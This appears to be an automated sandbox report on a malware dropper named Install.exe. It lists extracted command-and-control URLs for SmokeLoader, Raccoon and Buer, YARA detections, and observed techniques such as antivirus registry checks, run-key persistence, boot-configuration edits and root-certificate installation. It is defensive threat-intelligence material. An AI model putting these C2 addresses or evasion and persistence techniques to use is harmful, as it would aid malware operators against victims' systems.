Analysis
-
max time kernel
50s -
max time network
304s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7v20201028
General
-
Target
Install.exe
-
Size
852KB
-
MD5
98d1321a449526557d43498027e78a63
-
SHA1
d8584de7e33d30a8fc792b62aa7217d44332a345
-
SHA256
5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23
-
SHA512
3b6f59dbd605e59152837266a3e7814af463bb2cd7c9341c99fc5445de78e2dde73c11735bd145c6ad9c6d08d2c2810155558d5e9c441ac8b69ed609562385d0
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
e71b51d358b75fe1407b56bf2284e3fac50c860f
-
url4cnc
https://telete.in/oidmrwednesday
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
buer
securedocumentsholding.com
Signatures
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/6028-372-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral2/memory/6028-378-0x00000000038C0000-0x000000000411D000-memory.dmp family_glupteba behavioral2/memory/6028-379-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/5596-347-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral2/memory/5596-348-0x0000000000421E06-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x000100000001abbb-99.dat acprotect behavioral2/files/0x000100000001abbb-98.dat acprotect -
Buer Loader 1 IoCs
Detects Buer loader in memory or disk.
resource yara_rule behavioral2/memory/5660-1081-0x0000000040000000-0x0000000040009000-memory.dmp buer -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 15 IoCs
pid Process 6088 bcdedit.exe 952 bcdedit.exe 1356 bcdedit.exe 4808 bcdedit.exe 1216 bcdedit.exe 5464 bcdedit.exe 4544 bcdedit.exe 4604 bcdedit.exe 5772 bcdedit.exe 6592 bcdedit.exe 6104 bcdedit.exe 2856 bcdedit.exe 5600 bcdedit.exe 5708 bcdedit.exe 5588 bcdedit.exe -
Executes dropped EXE 30 IoCs
pid Process 3996 multitimer.exe 2388 multitimer.exe 1308 multitimer.exe 3900 imzg30qbxmn.exe 3984 ijo4lxccox0.exe 3924 askinstall24.exe 768 safebits.exe 3572 IBInstaller_97039.exe 1804 1qo2idpgnzy.exe 3864 vict.exe 904 ijo4lxccox0.tmp 3160 chashepro3.exe 1020 poqqozccrhb.exe 3996 vpn.exe 3728 IBInstaller_97039.tmp 2200 vict.tmp 1320 chashepro3.tmp 1836 vpn.tmp 1800 Abbas.exe 4144 Venita.exe 4312 8.exe 4448 Setup3310.exe 4464 app.exe 4588 chrome_proxy.exe 4668 Setup3310.tmp 4748 winlthst.exe 4968 wimapi.exe 4952 a23fsfzhsrm.exe 4800 a23fsfzhsrm.tmp 4656 PYNMEWDKA.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
resource yara_rule behavioral2/files/0x000100000001abbb-99.dat upx behavioral2/files/0x000100000001abbb-98.dat upx -
Loads dropped DLL 20 IoCs
pid Process 904 ijo4lxccox0.tmp 3728 IBInstaller_97039.tmp 2200 vict.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 4668 Setup3310.tmp 4668 Setup3310.tmp 4800 a23fsfzhsrm.tmp 4800 a23fsfzhsrm.tmp 4800 a23fsfzhsrm.tmp 4800 a23fsfzhsrm.tmp 4800 a23fsfzhsrm.tmp 4800 a23fsfzhsrm.tmp 4800 a23fsfzhsrm.tmp -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\63RAM58NKF0F2WD = "\"C:\\Program Files\\PYNMEWDKAA\\PYNMEWDKA.exe\"" PYNMEWDKA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\5t3c1qazcyv = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WQI2F1R5L1\\multitimer.exe\" 1 3.1615014594.60432ac288aad" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\7960083 = "\"C:\\Users\\Admin\\AppData\\Roaming\\1og12ld2j1r\\a23fsfzhsrm.exe\" /VERYSILENT" a23fsfzhsrm.tmp -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 18 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 241 ipinfo.io 463 checkip.amazonaws.com 601 ipinfo.io 598 ipinfo.io 627 ipinfo.io 130 checkip.amazonaws.com 193 ipinfo.io 270 ipinfo.io 273 ipinfo.io 493 ipinfo.io 61 ipinfo.io 144 ipinfo.io 413 ipinfo.io 64 ipinfo.io 323 ip-api.com 513 ipinfo.io 654 ip-api.com 669 checkip.amazonaws.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\JCleaner\is-0D7QL.tmp chashepro3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-QTRIH.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat ijo4lxccox0.tmp File created C:\Program Files\PYNMEWDKAA\uninstaller.exe.config 1qo2idpgnzy.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-GN0CP.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-PKJQA.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-3EMAF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QEQKI.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-Q6A35.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IR0BJ.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-KA926.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-SFVVJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-CVTG6.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-S0OPF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2D8G9.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Venita.exe chashepro3.tmp File created C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File created C:\Program Files (x86)\JCleaner\is-341DR.tmp chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-HOJEK.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-8BF95.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-G3FKP.tmp vpn.tmp File created C:\Program Files\PYNMEWDKAA\PYNMEWDKA.exe 1qo2idpgnzy.exe File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-5N2KP.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\is-KLPJK.tmp ijo4lxccox0.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-UMGO8.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-R2K6C.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-RM45S.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-PCHKL.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files\PYNMEWDKAA\PYNMEWDKA.exe.config 1qo2idpgnzy.exe File created C:\Program Files (x86)\viewerise\is-T35S0.tmp vict.tmp File opened for modification C:\Program Files (x86)\JCleaner\Abbas.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-4CQN2.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-7FQUE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-FMSGG.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-O185H.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\8.exe chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\is-FECOH.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-2TDA2.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-VCT6G.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-1K77K.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\is-PQQFV.tmp chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\is-4MBHO.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-TP4PB.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-NTDNS.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-EU3AF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-M4G8G.tmp vpn.tmp -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
pid pid_target Process procid_target 5116 1020 WerFault.exe 88 488 1020 WerFault.exe 88 3900 1020 WerFault.exe 88 2992 1020 WerFault.exe 88 3804 1020 WerFault.exe 88 5504 1020 WerFault.exe 88 5556 1020 WerFault.exe 88 5720 6184 WerFault.exe 335 7008 6184 WerFault.exe 335 6368 6184 WerFault.exe 335 3376 6184 WerFault.exe 335 6108 6184 WerFault.exe 335 5604 6184 WerFault.exe 335 6216 6184 WerFault.exe 335 6660 4216 WerFault.exe 388 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4288 schtasks.exe 6972 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 5908 timeout.exe 5224 timeout.exe 6616 timeout.exe 2840 timeout.exe 5508 timeout.exe 5476 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe -
Kills process with taskkill 7 IoCs
pid Process 5232 taskkill.exe 5016 TASKKILL.exe 4972 taskkill.exe 5876 taskkill.exe 6212 taskkill.exe 4416 taskkill.exe 3988 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall24.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall24.exe -
Runs .reg file with regedit 2 IoCs
pid Process 4604 regedit.exe 5040 regedit.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4528 PING.EXE -
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 599 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 626 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 192 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 272 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 492 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 512 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 69 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 143 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 238 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 412 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 416 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1308 multitimer.exe 1320 chashepro3.tmp 1320 chashepro3.tmp 3728 IBInstaller_97039.tmp 3728 IBInstaller_97039.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1252 powershell.exe 1252 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 628 Install.exe Token: SeDebugPrivilege 3996 multitimer.exe Token: SeDebugPrivilege 1308 multitimer.exe Token: SeDebugPrivilege 3900 WerFault.exe Token: SeDebugPrivilege 1836 vpn.tmp Token: SeDebugPrivilege 1836 vpn.tmp Token: SeDebugPrivilege 1252 powershell.exe Token: SeDebugPrivilege 4252 powershell.exe Token: SeDebugPrivilege 1804 1qo2idpgnzy.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeRestorePrivilege 5116 WerFault.exe Token: SeBackupPrivilege 5116 WerFault.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
pid Process 1320 chashepro3.tmp 3728 IBInstaller_97039.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 1836 vpn.tmp 4668 Setup3310.tmp 904 ijo4lxccox0.tmp 2200 vict.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
